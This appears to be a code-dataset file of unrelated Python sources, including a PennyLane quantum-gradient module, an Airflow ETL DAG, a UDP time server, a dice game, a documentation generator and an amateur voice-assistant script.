in the form three unitaries: :math:`UGV`.\r\n Starting from the initial state :math:`\\vert 0\\rangle`, the quantum state is evolved up to the\r\n \"pre-measurement\" state :math:`\\vert\\psi\\rangle=UGV\\vert 0\\rangle`, which is saved\r\n (this can be reused for each variable being differentiated).\r\n\r\n We then apply the unitary :math:`V^{-1}` to evolve this state backwards in time\r\n until just after the gate :math:`G` (hence the name \"reversible\").\r\n The generator of :math:`G` is then applied as a gate, and we evolve forward using :math:`V` again.\r\n At this stage, the state of the simulator is proportional to\r\n :math:`\\frac{\\partial}{\\partial\\theta}\\vert\\psi\\rangle`.\r\n Some further post-processing of this gives the derivative\r\n :math:`\\frac{\\partial}{\\partial\\theta} \\langle \\hat{O} \\rangle` for any observable O.\r\n\r\n The reversible approach is similar to backpropagation, but trades off extra computation for\r\n enhanced memory efficiency. Where backpropagation caches the state tensors at each step during\r\n a forward pass, the reversible method only caches the final pre-measurement state.\r\n\r\n Compared to the parameter-shift rule, the reversible method can\r\n be faster or slower, depending on the density and location of parametrized gates in a circuit\r\n (circuits with higher density of parametrized gates near the end of the circuit will see a\r\n benefit).\r\n \"\"\"\r\n\r\n def _grad_method(self, idx, use_graph=True, default_method=\"A\"):\r\n return super()._grad_method(idx, use_graph=use_graph, default_method=default_method)\r\n\r\n @staticmethod\r\n def _matrix_elem(vec1, obs, vec2, device):\r\n r\"\"\"Computes the matrix element of an observable.\r\n\r\n That is, given two basis states :math:`\\mathbf{i}`, :math:`\\mathbf{j}`,\r\n this method returns :math:`\\langle \\mathbf{i} \\vert \\hat{O} \\vert \\mathbf{j} \\rangle`.\r\n Unmeasured wires are contracted, and a scalar is returned.\r\n\r\n Args:\r\n vec1 (array[complex]): a length :math:`2^N` statevector\r\n obs (.Observable): a PennyLane observable\r\n vec2 (array[complex]): a length :math:`2^N` statevector\r\n device (.QubitDevice): the device used to compute the matrix elements\r\n \"\"\"\r\n # pylint: disable=protected-access\r\n mat = device._reshape(obs.matrix, [2] * len(obs.wires) * 2)\r\n wires = obs.wires\r\n\r\n vec1_indices = ABC[: device.num_wires]\r\n\r\n obs_in_indices = \"\".join(ABC_ARRAY[wires.tolist()].tolist())\r\n obs_out_indices = ABC[device.num_wires : device.num_wires + len(wires)]\r\n obs_indices = \"\".join([obs_in_indices, obs_out_indices])\r\n\r\n vec2_indices = reduce(\r\n lambda old_string, idx_pair: old_string.replace(idx_pair[0], idx_pair[1]),\r\n zip(obs_in_indices, obs_out_indices),\r\n vec1_indices,\r\n )\r\n\r\n einsum_str = \"{vec1_indices},{obs_indices},{vec2_indices}->\".format(\r\n vec1_indices=vec1_indices,\r\n obs_indices=obs_indices,\r\n vec2_indices=vec2_indices,\r\n )\r\n\r\n return device._einsum(einsum_str, device._conj(vec1), mat, vec2)\r\n\r\n def jacobian(self, device, params=None, **options):\r\n # The parameter_shift_var method needs to evaluate the circuit\r\n # at the unshifted parameter values; the pre-rotated statevector is then stored\r\n # self._state attribute. Here, we set the value of the attribute to None\r\n # before each Jacobian call, so that the statevector is calculated only once.\r\n self._state = None\r\n return super().jacobian(device, params, **options)\r\n\r\n def analytic_pd(self, idx, device, params=None, **options):\r\n t_idx = list(self.trainable_params)[idx]\r\n op = self._par_info[t_idx][\"op\"]\r\n p_idx = self._par_info[t_idx][\"p_idx\"]\r\n\r\n # The reversible tape only support differentiating\r\n # expectation values of observables for now.\r\n for m in self.measurements:\r\n if (\r\n m.return_type is qml.operation.Variance\r\n or m.return_type is qml.operation.Probability\r\n ):\r\n raise ValueError(\r\n f\"{m.return_type} is not supported with the reversible gradient method\"\r\n )\r\n\r\n # The reversible tape only supports the RX, RY, RZ, and Rot operations for now:\r\n #\r\n # * CRX, CRY, CRZ ops have a non-unitary matrix as generator.\r\n #\r\n # * PauliRot, MultiRZ, U2, and U3 do not have generators specified.\r\n #\r\n # TODO: the controlled rotations can be supported by multiplying ``state``\r\n # directly by these generators within this function\r\n # (or by allowing non-unitary matrix multiplies in the simulator backends)\r\n\r\n if op.name not in [\"RX\", \"RY\", \"RZ\", \"Rot\"]:\r\n raise ValueError(\r\n \"The {} gate is not currently supported with the \"\r\n \"reversible gradient method.\".format(op.name)\r\n )\r\n\r\n if self._state is None:\r\n self.execute_device(params, device)\r\n self._state = device._pre_rotated_state\r\n\r\n self.set_parameters(params)\r\n\r\n # create a new circuit which rewinds the pre-measurement state to just after `op`,\r\n # applies the generator of `op`, and then plays forward back to\r\n # pre-measurement step\r\n wires = op.wires\r\n op_idx = self.operations.index(op)\r\n\r\n # TODO: likely better to use circuitgraph to determine minimally necessary ops\r\n between_ops = self.operations[op_idx + 1 :]\r\n\r\n if op.name == \"Rot\":\r\n decomp = op.decomposition(*op.parameters, wires=wires)\r\n generator, multiplier = decomp[p_idx].generator\r\n between_ops = decomp[p_idx + 1 :] + between_ops\r\n else:\r\n generator, multiplier = op.generator\r\n\r\n generator = generator(wires)\r\n\r\n diff_circuit = QuantumTape()\r\n diff_circuit._ops = [copy(op).inv() for op in between_ops[::-1]] + [generator] + between_ops\r\n\r\n # set the simulator state to be the pre-measurement state\r\n device._state = self._state\r\n\r\n # evolve the pre-measurement state under this new circuit\r\n device.execute(diff_circuit)\r\n dstate = device._pre_rotated_state # TODO: this will only work for QubitDevices\r\n\r\n # compute matrix element for each observable O\r\n matrix_elems = device._asarray(\r\n [self._matrix_elem(dstate, ob, self._state, device) for ob in self.observables]\r\n # TODO: if all observables act on same number of wires, could\r\n # do all at once with einsum\r\n )\r\n\r\n # reset state back to pre-measurement value\r\n device._pre_rotated_state = self._state\r\n\r\n return 2 * multiplier * device._imag(matrix_elems)\r\n","sub_path":"pennylane/tape/tapes/reversible.py","file_name":"reversible.py","file_ext":"py","file_size_in_byte":9051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"26378133","text":"from remimi.generators.parallax_video_generator import ParallaxVideoGeneratorOption\n\n\nlooking_glass_8_9_inpaint_option = ParallaxVideoGeneratorOption(\n video_input_width = 820, \n video_input_height = 460,\n stereo_baseline = 0.00000140,\n focal_length=2000.0,\n inpaint=True,\n foreground_forward_z=0.7\n)\n\nDEFAULT_OPTIONS = {\n \"looking_glass_8_9_inpaint_option\": looking_glass_8_9_inpaint_option,\n}","sub_path":"configs/quilit_video_generator.py","file_name":"quilit_video_generator.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"243320915","text":"#!/usr/bin/env python\nimport sys\n\nSTART_YEAR = 2008\nEND_YEAR = 2018\n\n\ndef respect_condition(year):\n return year in range(START_YEAR, END_YEAR + 1)\n\n\nfor line in sys.stdin:\n data = line.strip().split(',')\n\n if len(data) == 8:\n ticker, _, close, _, _, _, volume, date = data\n\n if ticker != 'ticker':\n year = int(date[0:4])\n\n if respect_condition(year):\n print('{}\\t{}\\t{}\\t{}'.format(ticker, date, close, volume))\n","sub_path":"job1/mapreduce/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"11032293","text":"import socket\nimport datetime\n\n# Настройки сервера\nIP = \"127.0.0.1\"\nPORT = 20001\n\n# Создаем сокет\nwith socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as server_socket:\n # Привязываем сокет к IP и PORT\n server_socket.bind((IP, PORT))\n print(\"[INFO] Server is ready and waiting for clients...\")\n\n # Бесконечный цикл, чтобы прослушивать клиентов\n while True:\n # Принимаем данные от клиента\n data, address = server_socket.recvfrom(1024)\n data = data.decode(\"utf-8\")\n \n # Проверяем, является ли запрос о времени\n if data == \"Show time\":\n # Отправляем текущее время клиенту\n time = str(datetime.datetime.now().time())\n server_socket.sendto(time.encode(\"utf-8\"), address)\n else:\n # Если запрос не является запросом о времени, то завершаем работу сервера\n print(\"[INFO] Closing server...\")\n break\n","sub_path":"Labs/Laba_3_KSIT/test_one/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"600807256","text":"\n\n# 局部变量:在函数的内部定义的变量 我们称之为局部变量\n# 特点:其作用域范围是函数内部,而函数的外部是不可以使用\n\n#\n# def f1():\n# # 在函数内部定义的变量 我们叫做局部变量\n# a = 1\n# print(a)\n\n\n# f1()\n# print(a)\n\n\n# 全局变量: 定义在函数外部的变量 我们称之为全局变量\n# 特点:可以在函数的外部使用,也可以在函数的内部使用\n\na = 1\n\nprint(a)\n\ndef f1():\n print(a)\n\nf1()\n\n# 在满足条件的情况 要使用作用域最小的那个变量范围","sub_path":"尚硅谷Python学科爬虫教程/代码/046_尚硅谷_爬虫_函数_函数的局部变量和全局变量.py","file_name":"046_尚硅谷_爬虫_函数_函数的局部变量和全局变量.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"603713463","text":"import ast\nimport os\nimport re\n\npaths = ['../../mpf/mpf', '../../mpf-mc/mpfmc']\nrst_path = '../events'\n\n\nclass EventDocParser(object):\n\n def __init__(self):\n self.file = None\n self.file_list = list()\n\n def parse_file(self, file_name):\n\n self.file = file_name\n\n with open(file_name) as f:\n my_ast = ast.parse(f.read())\n\n for x in ast.walk(my_ast):\n if isinstance(x, ast.Str) and (x.s.strip().lower().startswith(\n 'event:')):\n event, rst = self.parse_string(x)\n\n if rst:\n filename = self.create_file(event, rst)\n self.file_list.append((event, filename))\n\n def write_index(self):\n\n index = '''Event reference\n===============\n\nHere's a list of all the \"built in\" events that are included in MPF and the\nMPF MC. Of course your own machine could include custom events that aren't\non the list here.\n\nSee the :doc:`Event Manager Overview ` for more information on\nhow MPF uses events.\n\n.. toctree ::\n :maxdepth: 1\n\n'''\n\n self.file_list.sort()\n\n for file_name in self.file_list:\n index += ' {} <{}>\\n'.format(file_name[0], file_name[1][:-4])\n\n with open(os.path.join(rst_path, 'event_reference.rst'), 'w') as f:\n f.write(index)\n\n def create_file(self, event, rst):\n filename = event.replace('(', '').replace(')', '') + '.rst'\n\n with open(os.path.join(rst_path, filename), 'w') as f:\n f.write(rst)\n\n return filename\n\n def parse_string(self, string):\n # string = string.s.replace('\\n', ' ') # strip newlines\n # string = ' '.join(string.s.split(' ')) # strip extra spaces\n string = '\\n'.join(' '.join(line.split())\n for line in string.s.split('\\n'))\n\n string = string.replace('Event:', 'event:')\n string = string.replace('Desc:', 'desc:')\n\n try:\n string = string.replace('Args:', 'args:')\n except ValueError:\n pass\n\n final_dict = self.string_to_args_dict(string, ['event', 'desc',\n 'args'])\n\n if 'desc' not in final_dict:\n # not an events docstring\n return (None, None)\n\n return self.build_rst_entry(final_dict)\n\n def string_to_args_dict(self, string, args):\n index_starts = list()\n\n for arg in args:\n try:\n index_starts.append(string.index(arg + ':'))\n except ValueError:\n pass\n\n index_starts.sort()\n sliced_list = list()\n for x in range(len(index_starts)):\n try:\n sliced_list.append(string[index_starts[x]:index_starts[\n x + 1]])\n except IndexError:\n sliced_list.append(string[index_starts[x]:])\n\n final_dict = dict()\n\n for entry in sliced_list:\n split_entry = entry.split(':', 1)\n final_dict[split_entry[0].strip()] = split_entry[1].strip()\n\n return final_dict\n\n def build_rst_entry(self, final_dict):\n rst_output = str()\n\n # write the title\n try:\n rst_output += final_dict['event']+ '\\n'\n except KeyError:\n print(\"Events entry missing from: {}\".format(self.file))\n\n rst_output += ('=' * len(final_dict['event'])) + '\\n\\n'\n rst_output += '*MPF Event*\\n\\n'\n\n # add the description\n rst_output += final_dict['desc'] + '\\n\\n\\n'\n\n # add the keyword arguments section\n\n rst_output += 'Keyword arguments\\n'\n rst_output += '-----------------\\n\\n'\n\n if 'args' in final_dict:\n rst_output += self.parse_args(final_dict['args'])\n else:\n rst_output += '*None*\\n'\n\n return final_dict['event'], rst_output\n\n def parse_args(self, args_string):\n\n args = list()\n output = str()\n\n for x in re.findall('\\\\b(\\w*)\\\\b(?=\\:)', args_string):\n if x:\n args.append(x)\n\n args_dict = self.string_to_args_dict(args_string, args)\n\n for k, v in sorted(args_dict.items()):\n output += k + '\\n'\n output += ('~' * len(k)) + '\\n'\n output += v + '\\n\\n'\n\n return output\n\nif __name__ == '__main__':\n a = EventDocParser()\n\n # delete existing files\n for path, _, files in os.walk(rst_path):\n for file in files:\n if file not in ['index.rst', 'event_types.rst']:\n os.remove(os.path.join(path, file))\n\n # walk through the folders to scan\n for path in paths:\n for root, _, files in os.walk(path):\n for file in [x for x in files if x.endswith('.py')]:\n a.parse_file(os.path.join(root, file))\n\n # create the index.rst based on everything that was found\n a.write_index()\n","sub_path":"_doc_tools/build_events_reference_docs.py","file_name":"build_events_reference_docs.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"128038106","text":"__author__ = 'benvc'\nimport speech_recognition as sr\n\n\n# Load voice engine settings\nengine = pyttsx.init()\n# rate for how fast the voice speaks\nengine.setProperty('rate', 167)\nvoices = engine.getProperty('voices')\n\n# Welcome message for user\nwelcomeMsg = \"Welcome Sir\"\nengine.say(welcomeMsg)\nengine.runAndWait()\n# only outer scoped variable\nrequest = \"\"\n\n\n#Functions for things\ndef Googling(i):\n import os\n #base google results url\n googlelink = \"https://www.google.ca/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=\"\n\n # Replace all text implementations\n i = i.replace(\"Aries \", \"\")\n i = i.replace(\"google \", \"\")\n i = i.replace(\" please\", \"\")\n i = i.replace(\" for me\", \"\")\n # speech\n engine.say(\"searching for \" + i)\n engine.runAndWait()\n # replace spaces with %20 for google search\n i = i.replace(\" \", \"%20\")\n # Concatenation of string\n googlelink = 'start chrome \"%s%s\"' % (googlelink, i)\n # open Chrome\n os.system(googlelink)\n for x in range(3):\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"--\")\n audio = r.listen(source)\n # recognize speech using Google Speech Recognition\n request = r.recognize_google(audio)\n # Fetch the problem problem to give the proper output\n try:\n print(\"Google Request: \" + request)\n except sr.UnknownValueError:\n print(\"No Audio Detected\")\n except sr.RequestError as e:\n print(\"Internal Error\")\n if \"open first link\" in str(request):\n SendKeys.SendKeys('{DOWN}')\n SendKeys.SendKeys('{ENTER}')\n elif \"open second link\" in str(request):\n for x in range(2):\n SendKeys.SendKeys('{DOWN}')\n SendKeys.SendKeys('{ENTER}')\n elif \"open third link\" in str(request):\n for x in range(3):\n SendKeys.SendKeys('{DOWN}')\n SendKeys.SendKeys('{ENTER}')\n elif \"open fourth link\" in str(request):\n for x in range(4):\n SendKeys.SendKeys('{DOWN}')\n SendKeys.SendKeys('{ENTER}')\n elif \"open fifth link\" in str(request):\n for x in range(5):\n SendKeys.SendKeys('{DOWN}')\n SendKeys.SendKeys('{ENTER}')\n elif \"open sixth link\" in str(request):\n for x in range(6):\n SendKeys.SendKeys('{DOWN}')\n SendKeys.SendKeys('{ENTER}')\n\ndef machineTime():\n import time\n #Time (localtime off machine)\n dt = list(time.localtime())\n hourtime = dt[3]\n minutetime = dt[4]\n #Calculate AM/PM plus hours and minutes\n if hourtime > 12:\n hourtime -= 12\n timeOfDay = \"PM\"\n else:\n timeOfDay = \"AM\"\n if minutetime < 10:\n minute1 = 0\n else:\n minute1 = \"\"\n time = str(hourtime) + \":\" + str(minute1) + str(minutetime) + str(timeOfDay)\n return(time)\n\ndef openexes(i):\n if \"open wow\" in str(i) or \"open world or warcraft\" in str(i):\n engine.say(\"Opening World of Warcraft\")\n engine.runAndWait()\n # Open WoW\n os.system('C:\\Program Files (x86)\\World of Warcraft')\n\n elif \"open mine craft\" in str(i) or \"open minecraft\" in str(i):\n engine.say(\"Opening minecraft\")\n engine.runAndWait()\n # open Minecraft\n os.system('\"C:/Users/benvc/Desktop/Minecraft.exe\"')\n\n elif \"open steam\" in str(i):\n engine.say(\"Opening Steam\")\n engine.runAndWait()\n # open Steam\n os.system('\"C:/Users/benvc/Desktop/Steam.exe\"')\n else:\n\n # Replace all text implementations and obsurities\n i = i.replace(\"Aries \", \"\")\n i = i.replace(\"open\", \"\")\n i = i.replace(\"please\", \"\")\n i = i.replace(\"dot\", \".\")\n i = i.replace(\" \", \"\")\n # Get engine to speak\n engine.say(\"Opening \" + request)\n engine.runAndWait()\n # format the website URL with the chrome starter\n SiteURL = 'start chrome \"%s\"' % request\n # actually open it\n os.system(SiteURL)\n\ndef AriesIdle(i):\n # Remove the text leaving time and h/m/s\n i = i.replace(\"Aries\", \"\")\n # Speech\n engine.say(i)\n engine.runAndWait()\n i = i.replace(\"idle\", \"\")\n i = i.replace(\"for\", \"\")\n i = i.replace(\" \", \"\")\n # If statements\n if \"hour\" in str(i) or \"hours\" in str(i):\n i = i.replace(\"hour\",\"\")\n i = i.replace(\"s\",\"\")\n i = float(i) * 60 * 60\n time.sleep(float(i))\n\n elif \"minute\" in str(request) or \"minutes\" in str(i):\n i = i.replace(\"minute\",\"\")\n i = i.replace(\"s\",\"\")\n i = float(i) * 60\n time.sleep(float(i))\n\n elif \"second\" in str(request) or \"seconds\" in str(i):\n i = i.replace(\"second\",\"\")\n i = i.replace(\"s\",\"\")\n time.sleep(float(i))\n\ndef writeNote(i):\n # Remove Aries and commands\n i = i.replace(\"Aries\", \"\")\n i = i.replace(\"make a note\", \"\")\n i = i.replace(\"make note\", \"\")\n i = i.replace(\"write a note\", \"\")\n i = i.replace(\"take note\", \"\")\n ts = time.time()\n date1 = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n f = open(\"C://Users/benvc/Desktop/AriesNotes.txt\", \"a\")\n f.write(str(date1) + \": \" + i + \"\\n\")\n f.close()\n # Speech\n engine.say(\"Note Written\")\n engine.runAndWait()\n #print(\"Note Written\")\n#TODO\ndef closeExe(i):\n i = i.replace(\"Aries\", \"\")\n i = i.replace(\"close\", \"\")\n i = i.replace(\" \", \"\")\n\n engine.say(\"closing \" + i)\n if i == \"chrome\":\n os.system('taskkill /im chrome.exe')\n engine.runAndWait()\n taskkill = \"'taskkill /im %s.exe'\" % i\n os.system('%s') % taskkill\n\ndef closeNotes():\n f = open(\"C://Users/benvc/Desktop/AriesNotes.txt\", \"w\")\n f.write(\"\")\n f.close()\n # Speech\n engine.say(\"Notes Cleared\")\n engine.runAndWait()\n\ndef AriesType(i):\n # Remove the question and replace spaces\n i = i[12:]\n i = i.replace(\" \", \"{SPACE}\")\n # Send keystrokes through\n SendKeys.SendKeys(str(i))\n\ndef weather():\n #site URL\n url = 'https://weather.gc.ca/city/pages/ns-19_metric_e.html'\n #Open page as HTML\n page = urllib2.urlopen(url)\n soup = BeautifulSoup(page.read())\n #Strip everything but the words\n condition = soup.find(\"dl\", {\"class\": \"col-sm-6 dl-horizontal wxo-dl mrgn-bttm-0\"}).contents\n condition = str(condition)\n condition = condition.replace(\"n'\", \" \")\n condition = condition.replace(\"u'\", \" \")\n condition = condition.replace(\" \\ \", \" \")\n condition = condition.replace(\"
Condition:
\", \" \")\n condition = condition.replace(\"
\",\"\")\n condition = condition.replace('class=\"mrgn-bttm-0',\"\")\n condition = condition.replace('[ ,
Condition:
, ,
', \" \")\n condition = condition.replace('
Pressure:
, ,
101.2 kPa', \"\")\n condition = condition.replace('
, ,
29.9 inches
, ,
Tendency:
, ,
falling
, ,
Visibility:
, ,
24 km', \"\")\n condition = condition.replace('
, ,
15 miles
, ]', \" \")\n condition = condition.replace(\"
\", \"\")\n condition = condition.replace(\"
\",\"\")\n condition = condition.replace('
Pressure:
',\"\")\n condition = condition.replace(\",\",\"\")\n condition = condition.replace('
101.0 kPa',\"\")\n condition = condition.replace('
29.8 inches
Tendency:
falling
Visibility:
24 km',\"\")\n condition = condition.replace('class',\"\")\n condition = condition[:20]\n condition = condition.replace('
',\"\")\n for x in range(10):\n condition = condition.replace(' ',\" \")\n temp = soup.find(\"span\", {\"class\": \"wxo-metric-hide\"}).contents\n tempString = str(temp)\n tempString = tempString.replace(\"[u'\", \"\")\n #tempString = tempString.replace(\"-\", \"\")\n tempString = tempString.replace(\"°', C, u'\", \" \")\n tempString = tempString.replace('\"', \"\" )\n tempString = tempString.replace(\"n']\", \" \" )\n tempString = tempString.replace(\" \\ \", \"\")\n #Print statement\n Weather = (\"The weather is \" + condition + \"and \" + tempString)\n engine.say(Weather)\n engine.runAndWait()\n print(Weather)\n\ndef restart():\n os.execl(sys.executable, sys.executable, *sys.argv)\n\n# Start the run procedure\n# Loop until I quit the program\nfor x in range(100000000):\n while request != \"aries shut down\":\n if request == \"aries shut down\":\n os.quit()\n # Reset request at beginning of loop\n request = \"\"\n # Try to pick up microphone audio, if it doesn't it fails\n try:\n # recognize speech using Google Speech Recognition\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"..\")\n audio = r.listen(source)\n # recognize speech using Google Speech Recognition\n request = r.recognize_google(audio)\n\n # Fetch the problem problem to give the proper output\n\n print(\"CMD: \" + request)\n # Make the request in lower\n request = request.lower()\n if \"aries\" in str(request):\n for y in range(250):\n request = \"\"\n # Try to pick up microphone audio, if it doesn't it fails\n try:\n # recognize speech using Google Speech Recognition\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"..\")\n audio = r.listen(source)\n # recognize speech using Google Speech Recognition\n request = r.recognize_google(audio)\n\n # Fetch the problem problem to give the proper output\n\n\n # Make the request in lower\n request = request.lower()\n\n # If to see if Aries is said\n # Commands in If statements\n # if \"make a note\" in str(request) or \"make note\" in str(request) or \"write a note\" in str(request) or \"take note\" in str(request):\n # writeNote(request)\n #\n # # Weather right now\n # elif \"weather right now\" in str(request) or \"what's the weather like\" in str(request) or \"how is the weather\" in str(request):\n # weather()\n #\n #\n # # Idle Aries for a time amount\n # elif \"idle for\" in str(request):\n # AriesIdle(request)\n #\n # # Clear the notepad file\n # elif \"clear my notes\" in str(request) or \"clear notes\" in str(request) or \"clear my nose\" in str(request):\n # closeNotes()\n #\n # # Make Aries Tab\n # elif \"aries tab\" in str(request):\n # #Tab using Sendkeys\n # SendKeys.SendKeys(\"%{TAB}\")\n #\n # # Chrome switch tab\n # elif \"switch tab\" in str(request):\n # #Tab using Sendkeys\n # SendKeys.SendKeys(\"^{TAB}\")\n #\n # # Google search\n # elif \"search this\" in str(request) or \"Aries google\" in str(request) or \"Aries look up\" in str(request):\n # Googling(request)\n #\n # # Get Aries to type things out\n # elif \"type\" in str(request):\n # AriesType(request)\n #\n # # Second command for Aries typing\n # elif \"say\" in str(request):\n # AriesType(request)\n #\n # # Open anything\n # elif \"aries open\" in str(request):\n # openexes(request)\n #\n # elif \"aries close\" in str(request):\n # print(\"close\")\n # closeExe(request)\n #\n # elif \"open alarm\" in str(request) or \"open alarm\" in str(request):\n # os.system('AIalarm.py')\n # os.quit()\n #\n # elif \"restart 202\" in str(request):\n # restart()\n #\n # # print process time\n # elif \"current process time\" in str(request):\n # runtime = time.clock()\n # engine.say(str(runtime.format(2)) + \" seconds of run time.\")\n # engine.runAndWait()\n #\n # else:\n # print(\"Nothing Triggered\")\n\n except:\n print(str(time.clock()) + \" seconds of run time.\")\n except:\n print(\"\")","sub_path":"ARCHIVED/__ARIESMAIN__.py","file_name":"__ARIESMAIN__.py","file_ext":"py","file_size_in_byte":14807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"480037926","text":"'''Examples of organizer-provided metrics.\nYou can just replace this code by your own.\nMake sure to indicate the name of the function that you chose as metric function\nin the file metric.txt. E.g. mse_metric, because this file may contain more \nthan one function, hence you must specify the name of the function that is your metric.'''\n\nimport numpy as np\nimport scipy as sp\n\ndef accuracy(solution, prediction):\n error = 0\n for sol, pred in zip(solution, prediction):\n if sol != pred:\n error += 1\n return 1 - (error / len(solution))\n\n","sub_path":"starting_kit/scoring_program/my_metric.py","file_name":"my_metric.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"630204570","text":"from random import randint\n\n# define defaults for max dices and dice sides:\nmax_dices = 6\nmax_sides = 100\n\n\ndef gameRestart(dice_num, dice_sides): # this function handles restart\n print('Want to roll same dices again? Type \"r\"')\n print('Want to select new dices? Type \"n\"')\n print('Want to stop playing? Type \"s\"')\n restart = input('>')\n if restart.lower() == 'r':\n rollDice(dice_num, dice_sides)\n elif restart.lower() == 'n':\n gameInit()\n elif restart.lower() == 's':\n print(\"Thank you for using this program! See you next time!\")\n quit()\n else:\n print(\"Sorry, I did not understand you, try again:\")\n gameRestart(dice_num, dice_sides)\n\n\ndef rollDice(dice_num, dice_sides): # this function handles rolling the dices\n total_sum = 0\n print(\"\\n\\n\\nYou rolled %s %s-sided dices:\" % (dice_num, dice_sides))\n for i in range(0, dice_num):\n roll_result = randint(1, dice_sides)\n print(\"Dice #%s rolled %s\" % (i + 1, roll_result))\n total_sum += roll_result\n if dice_num > 1:\n print(\"\\nTotal dice sum: %s\" % total_sum)\n gameRestart(dice_num, dice_sides)\n\n\ndef gameInit(): # startup function that gathers basic values of number of dices and number of their sides\n while True:\n dice_num = input(\"Please enter how many dices you need to roll from 1 to %s:\\n> \" % max_dices)\n dice_sides = input(\"How many sides per dice? You can select between 2 and %s:\\n> \" % max_sides)\n try:\n if int(dice_num) not in range(1, max_dices + 1) or int(dice_sides) not in range(2, max_sides + 1):\n print(\"\\nPlease input valid values for number of dices and their sides\\n\")\n else:\n rollDice(int(dice_num), int(dice_sides))\n break\n except ValueError:\n print(\"\\nPlease only use integers!\\n\")\n\n# Here we start a game:\ngameInit()\n","sub_path":"python_projects/DiceRoll.py","file_name":"DiceRoll.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"6161199","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 15 17:05:20 2021\n\n@author: viswa\n\"\"\"\n\nfrom airflow import DAG\nfrom datetime import datetime, timedelta\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.mysql_operator import MySqlOperator\nfrom airflow.operators.email_operator import EmailOperator\nfrom datetime import datetime,timedelta\nfrom pre_process import process_data\nfrom pre_processing import pre_process\n\n\n\ndefault_args = {\"owner\": \"airflow\", \"start_date\": datetime(2021, 6, 15)}\n\nwith DAG(dag_id=\"analytics\",default_args=default_args,schedule_interval='@daily',catchup=True) as dag:\n \n check_file = BashOperator(\n task_id=\"check_file\",\n bash_command=\"shasum ~/ip_files/or.csv\",\n retries=2,\n retry_delay=timedelta(seconds=15)\n )\n \n pre_process = PythonOperator(\n task_id = \"pre\",\n python_callable = pre_process\n )\n \n groupbys = PythonOperator(\n task_id=\"aggre\",\n python_callable=process_data\n )\n \n create_table = MySqlOperator(\n task_id='create_table', \n mysql_conn_id=\"mysql_db1\", \n sql=\"CREATE table IF NOT EXISTS aggre_res (stock_code varchar(100) NULL,descb varchar(100) NULL,country varchar(100) NULL,total_price varchar(100) NULL)\"\n )\n\n \n insert = MySqlOperator(\n task_id='insert_db', \n mysql_conn_id=\"mysql_db1\", \n sql=\"LOAD DATA INFILE '/var/lib/mysql-files/fin.csv' INTO TABLE aggre_res FIELDS TERMINATED BY ',' LINES TERMINATED BY '\\n' IGNORE 1 ROWS;\")\n \n email = EmailOperator(task_id='send_email',\n to='viswatejaster@gmail.com',\n subject='Daily report generated',\n html_content=\"\"\"

Congratulations! Your store reports are ready.

\"\"\",\n )\n\n check_file >> pre_process >> groupbys >> create_table >> insert >> email","sub_path":"Airflow 2.0/docker-airflow/dags/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"612728593","text":"from parser_utils import get_args\nfrom preprocess_docs import CorpusPreProcessor, GRAPH_PREPROCESS_ARGS\nfrom dataloader import DocumentGraphDataset\nfrom learner import Learner\n\nif __name__ == \"__main__\":\n\n args, device = get_args()\n\n ######################################\n # Initiate learner\n ######################################\n learner = Learner(\n experiment_name=args.experiment_name, device=device, multi_label=False\n )\n # Store how the args for constructing graphs from text in the learner\n # such that these can be stored with the saved model\n graph_preprocessing_args = {\n 'use_master_node':args.use_master_node,\n 'use_directed_edges':args.use_directed_edges,\n 'normalize_edges':args.normalize_edges,\n 'window_size':args.window_size,\n }\n learner.set_graph_preprocessing_args(\n graph_preprocessing_args\n )\n\n word2idx = None\n # Load pretrained model\n if args.pretrained_model is not None:\n\n assert (\n args.path_to_word2idx is not None\n ), \"The word2idx path must be given when a pretrained model is loaded\"\n learner.load_model(args.pretrained_model, lr=args.lr)\n # Overwrite from the pre-trained model\n graph_preprocessing_args = learner.get_graph_preprocessing_args()\n\n # Check if the graph preprocessing arguments are consistent with those expected\n assert set(list(graph_preprocessing_args.keys())) == set(\n GRAPH_PREPROCESS_ARGS), \"Error, invalid arguments for the graph preprocessing args, got keys: {}, \\n expected: {}\".format(\n list(graph_preprocessing_args.keys()), GRAPH_PREPROCESS_ARGS)\n\n ######################################\n # Initiate corpus prepper\n ######################################\n corpus_prepper = CorpusPreProcessor(\n min_freq_word=args.min_freq_word,\n multi_label=False,\n word2idx_path=args.path_to_word2idx,\n )\n\n if args.do_train:\n\n ######################################\n # Load dataset\n ######################################\n print(\"Loading dataset...\")\n # Read data\n docs, labels, n_labels, word2idx = corpus_prepper.load_clean_corpus(\n args.path_to_dataset\n )\n # Split into train/val\n train_docs, dev_docs, train_labels, dev_labels = corpus_prepper.split_corpus(\n docs, labels, 